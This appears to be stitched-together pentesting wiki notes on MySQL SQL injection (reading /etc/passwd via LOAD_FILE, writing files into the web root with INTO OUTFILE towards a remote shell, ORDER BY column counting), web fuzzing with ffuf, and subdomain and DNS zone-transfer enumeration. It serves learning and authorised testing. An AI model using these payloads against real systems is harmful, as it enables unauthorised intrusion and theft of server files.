After enumerating user privileges 🌿 if you find one which has FILE you can use that to read files from the target.

UNION SELECT LOAD_FILE('/etc/passwd')

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿
• Writing files with MySQL 🌱

Tools

• sqlmap ↗️ has a --proxy flag

Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!

Techniques

• Writing files with MySQL 🌱
• Reading files with MySQL 🌱
• How to determine the number of columns for union SQL injection 🌿
• Enumerating database tables and columns with SQL injection 🌿

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

• null: cannot write anywhere on system
• "" (empty string): can write anywhere
• "/path/to/dir": can write only to specified path

SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES 

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

order by

In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes:

Here are some resources containing XSS payloads:

• PayloadsAllTheThings ↗️
• payloadbox ↗️
• findxss ↗️

base64

echo 'test' | base64
echo 'dGVzdAo=' | base64 -d

hex

echo 'test' | xxd -p
echo '746573740a' | xxd -p -r

rot13

echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'

• unpacker ↗️ reverses jspacker. Signature eval(function(p,a,c,k,e,r)

References

• Encoding and decoding with base64, hex, etc on command line 🌱

Some example ffuf commands

In each case, FUZZ is the placeholder for word replacement.**

Fuzzing for specific extensions

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/target_dir/FUZZ 
  -e .txt,.html,.bak # etc 

Recursive fuzzing

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -u http://example.com/target_dir/FUZZ \
  -recursion

Fuzzing a POST parameter

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/example.php \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "y=FUZZ"
  -ic

Fuzzing a GET parameter

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/example.php?x=FUZZ \
  -ic

References

• Brute forcing subdomain enumeration 🌿

dnsenum

Performs various dns-level and osint searches to find sub domains.

dnsenum \
  --enum target.tld \
  -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

gobuster

You can do virtual host subdomain brute forcing with gobuster. You can specify the target as a hostname or ip.

gobuster vhost \
  -u http[s]://targetip[:port] \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
  --append-domain

You can do a DNS zone transfer using dig by using axfr

dig axfr @dns-server.com target.tld

This will return all dns records for target.tld. It’s intended to copy all records from a primary to secondary server and should only happen if trusted, but misconfigured servers may allow unauthorised transfers allowing for enumeration without brute forcing 🌿 .